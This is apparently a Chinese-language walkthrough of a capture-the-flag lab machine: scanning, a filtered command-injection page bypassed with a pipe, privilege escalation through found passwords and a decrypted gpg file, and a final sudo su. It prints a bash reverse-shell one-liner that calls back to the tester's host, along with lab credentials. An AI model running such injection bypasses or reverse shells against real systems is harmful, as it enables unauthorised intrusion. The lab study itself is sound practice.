一、配置靶机
1、配置靶机网卡
2、kali扫描靶机IP
nmap 192.168.31.0/24
3、扫描靶机开启的端口及服务
nmap -sV -p- -A -Pn 192.168.31.146
4、进行靶机目录扫描
dirsearch -u http://192.168.31.146
二、web渗透测试
1、访问靶机IP地址
2、查找页面功能点
在点击到contact US时,发现了好多用户邮箱和手机号,经过发现,bob可能是管理员用户
3、拼接访问扫描的路径
拼接passwords.html
是一段留言,没有什么信息
拼接/robots.txt
发现了新的路径
继续拼接访问
拼接/dev_shell.php
发现是个命令执行漏洞,但是部分命令被禁用了
尝试用管道符或者是特殊符号绕过过滤。这里通过管道符'|'列出当前目录下的文件
4、尝试反弹shell
id & echo "bash -i >& /dev/tcp/192.168.31.128/5555 0>&1" | bash
成功反弹
三、提权
1、查看是否有权限文件
没有可利用的
2、查看home家目录有啥
切换到家目录,发现有四个用户,分别对应Contact Us页面中IT部门的四个工作人员
先看bob的家目录里面有什么
查看这个password文件
<html> <p> jc:Qwerty seb:T1tanium_Pa$$word_Hack3rs_Fear_M3 </p> </html>
直接告诉了jc和seb的密码
查看这俩用户的目录
jc
seb
elliot
这儿发现了一个txt文件,查看
也没搞懂啥意思,但是信中的内容提到了bob,所以再次进入bob的家目录看一下
在Documents
这个路径下发现了三个文件
分别查看其内容
staff.txt
没啥子用
login.txt.gpg
需要密钥才能查看
还有一个Secret
的文件夹,随着这个文件往下面找
发现个sh可执行文件,查看
没看懂,网上查资料发现这个密钥就是藏头诗,所以密钥就为HARPOCRATES
然后回到那个gpg文件所在的目录,进行解密
gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
提示好像是权限不够
3、ssh连接jc用户
ssh jc@192.168.233.133 -p 25468
密码:Qwerty
注意ssh端口是25468
切换到那个gpg,再次进行解密
成功获得bob密码
4、切换到bob用户
利用sudo -l查看权限
发现ALL有用用户都可以,直接sudo su提权
提权成功!!!!